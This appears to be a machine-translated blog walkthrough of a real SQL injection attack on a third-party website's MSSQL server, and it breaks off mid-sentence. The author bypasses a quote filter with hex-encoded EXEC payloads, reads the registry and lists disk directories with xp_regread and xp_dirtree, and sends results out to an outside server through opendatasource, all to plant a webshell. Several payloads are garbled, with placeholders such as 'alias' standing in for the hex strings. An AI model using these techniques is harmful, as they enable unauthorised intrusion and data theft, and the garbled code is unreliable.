SQL Injection Advanced Skills nowthk

My goal is to get the website directory. Of course, the website and the mssql database are on a server with the permission DB_owner.

A note was found on a website, prompting "xxxxxxxxxx0 error". After preliminary analysis, the single quotation marks were directly converted to 0. Therefore, if you use a tool, you cannot inject them, in practice, the tool does not work, but the permission can be detected as DB_owner. The method for manual detection is: and 1 = (select is_isvrolemember (sysadmin), which is a simple system permission. Fortunately, there is only a limit on single quotes, and there is no limit on other symbols. However, this is indeed troublesome.
　　
Our goal is to check where the website directory is located. If it is found, back up the database directly and obtain webshell.
　　
First, extract the location of the website directory in the registry at the beginning of IIS settings, and then storm it out.
Create a table xy,; create table xy (xy1 nvarchar (256) null), and insert the value in the table. The statement is as follows:
; DECLARE @ result varchar (255) EXEC master. dbo. xp_regread HKEY_LOCAL_MACHINE, SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots,/, @ result output insert into xy (xy1) values (@ result)
Because of the conversion of single quotes, the above command is certainly not successful. Now we can think of using the declare function. At first, my approach was to combine HKEY_LOCAL_MACHINE, SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots and /, the three data are attached to three variables respectively. The statement composition is as follows:
; DECLARE @ a varchar (255) select @ a = 0x484b45595f4c4f43414c5f4d414348494e45 DECLARE @ B varchar (255) select @ B = includeclare @ c varchar (255) select @ c = 0x2f DECLARE @ result varchar (255) exec master. dbo. xp_regread @ a, @ B, @ c, @ result output insert xy (xy1) values (@ result )--

I didn't expect it to succeed at all. I don't know the reason, and I went to Baidu to search for the reason. I found the same problem in the evil 8 discussion board. I haven't discussed the result yet, therefore, this method is put for the moment, and a new method will be obtained after two days. declare is also used to attach values to a variable. However, it is not a piece of data, but a sentence.

The method is as follows:
DECLARE @ result varchar (255) EXEC master. dbo. xp_regread HKEY_LOCAL_MACHINE, SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots,/, @ result output insert into xy (xy1) values (@ result)
Full conversion to hexadecimal:
Bytes
In this case, DECLARE @ s nvarchar (4000); SET @ S = CAST (alias as nvarchar (4000); EXEC (@ S)
The execution is successful directly. Well, no single quotes are used. This method can be figured out now. Let's just make a little breakthrough.

Submit the preceding statement directly in the browser, return to the normal page, and then use and 1 = (selet top 1 xy1 from xy) to generate the website Directory d: wwwfuck, haha, with luck, backing up the database directly under this directory failed! Conclusion: 1. The statement is correct. 2. The directory is faulty.
So now, you can guess that the website directory is on disk D. The only feasible method is to launch a brute-force directory one by one ~, Depressing and troublesome things are coming again!
I was too lazy. Then I thought of the opendatasource command in SQL. I installed SQL on my machine and the IP address was 211.11.11.11, I want to insert the results returned by remote SQL Execution directly to the table created by my own machine SQL, so it is easy to prove whether the results are successful, create a table named ku (id nvarchar (255), and then submit the table in the following format:
Insert into opendatasource (sqloledb, server = 211.11.11.11; uid = sa; pwd = fuck !!; Database = test). test. dbo. ku select name from master. dbo. sysdatabases
Test is my own database, and ku is the table name in the test database. If the table name is successful, open the ku table locally. The above statement lists the names of all databases on the remote server.
The preceding statement has single quotes. We can directly convert it to hexadecimal format. After conversion, use the following statement to submit the statement:
; DECLARE @ s nvarchar (4000); SET @ S = CAST (alias as nvarchar (4000); EXEC (@ S );
Open the ku table in the local database test. Hey, the names of all remote databases are successfully listed.
The directory under drive D on the server is returned.

Create table temp (id nvarchar (255), num1 nvarchar (255) -- Succeeded
Insert all levels of data directories to the table (level 1 directory is the root directory of disk D, level 2 is the next layer, Level 3 is the same), statement:; insert into temp (id, num1) exec master. dbo. xp_dirtree D: There are single quotes. The above statement is definitely not successful. You must use declare to enclose the value variable. Well, I will write the statement directly:
DECLARE @ s nvarchar (4000); SET @ S = CAST (alias as nvarchar (4000); EXEC (@ S );
Now, in the temp table, all the directories on the d disk are available, where num1 = 1 is the first-level directory, num1 = 2 is the second-level directory, and so on.
Okay. Let me return the first-level directory in the temp table to the local machine.
Create a local table mulu (name char (255) with the following remote statement:
Insert into opendatasource (sqloledb, server = 211.11.11.11; uid = sa; pwd = fuck !!; Database = test). test. dbo. mulu select id from temp where num1 = 1
Convert to hexadecimal declare with variable submission, my day ~~ After a long time, such as a crash, it failed... Please contact me if you know the reason.

Since the lazy method is not good, forget it. Be diligent! Depressed!
The above temp remote table still has a directory name, which is too messy. create a new table remotely:; create talbe temp1 (id nvarchar (4000 )) -- Then insert the first-level directory name in the temp table here. Statement:; insert into temp1 (id) select id from temp where num1 = 1 --
Then, run the following command: and 1 = (select top 1 id from temp1 where id = 1). The prompt is: xxxxxxxxxxmubak is converted to int ..... are I too lazy to copy error information? Just understand.
The following directory cannot use and 1 = (select top 1 id from temp1 where id not in (MUbak? Because there are single quotes, isn't it possible to use declare? Error! This is not a brute-force attack. Do not make a mistake!

I smoked a cigarette and thought about it. There is another way to drag down the temp1 directory layer by layer and pass them to the temp2 table; create table temp2 (id char (255 ))--.
First, I want to understand the statement. I give all the names under the id of temp1 to temp2, and do not include the MUbak directory. Then the statement should be:
Insert into temp2 (id) select id from temp1 where id not in (MUbak)
Haha, there are single quotes, declare !!!, The preceding statement is in hexadecimal notation.
Statement:
DECLARE @ s nvarchar (4000); SET @ S = CAST (alias as nvarchar (4000); EXEC (@ S );
At this time, in the temp2 brute force table: and 1 = (select top 1 id from temp2), I am prompted to convert xxxxxxxxxxwwwbak to int... and other errors .. Another directory came out.
However